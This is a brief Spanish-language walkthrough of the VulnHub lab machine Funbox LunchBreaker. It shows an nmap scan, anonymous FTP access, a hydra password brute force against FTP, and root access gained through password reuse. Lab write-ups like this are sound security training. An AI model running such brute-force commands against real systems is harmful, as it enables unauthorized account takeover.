cd ~/blog

~/writeups/vulnhub/21-funbox-lunchbreaker.md

21 - Funbox LunchBreaker

easy Linux vulnhub 23-10-2023
Anonymous FTPFTP/SSH credential brute force (hydra)Password reuse (root)
www.vulnhub.com/entry/funbox-lunchbreaker,766/

~1 min de lectura


Enumeramos puertos: 21 (vsftpd con anónimo), 22, 80 (WordPress):

 sudo nmap -sC -sV -p21,22,80 -oN 02-targeted 192.168.1.36
...
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed
| -rw-r--r--    1 0  0   633 May 22  2021 supers3cr3t
|_drwxr-xr-x    6 1006 ... wordpress
...

Por FTP anónimo descargamos un archivo en brainfuck y otro oculto en base64, y vemos un WordPress. El código de la web tiene un comentario con un posible usuario (jane), que crackeamos con hydra:

 hydra -l jane -P rockyou.txt ftp://192.168.1.36
[21][ftp] host: 192.168.1.36   login: jane   password: password

Accediendo por FTP encontramos un archivo de keys y una lista de usuarios (jane, jim, jules). Con hydra sobre esa lista llegamos a credenciales en el directorio de jules, que nos dan la contraseña de john (válida también por SSH).

En el FTP de john hay una pista sobre la contraseña de root: es la misma de john. Por SSH:

john@lunchbreaker:~$ su root    # misma contraseña que john
root@lunchbreaker:~#

Obtenemos la flag de root.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados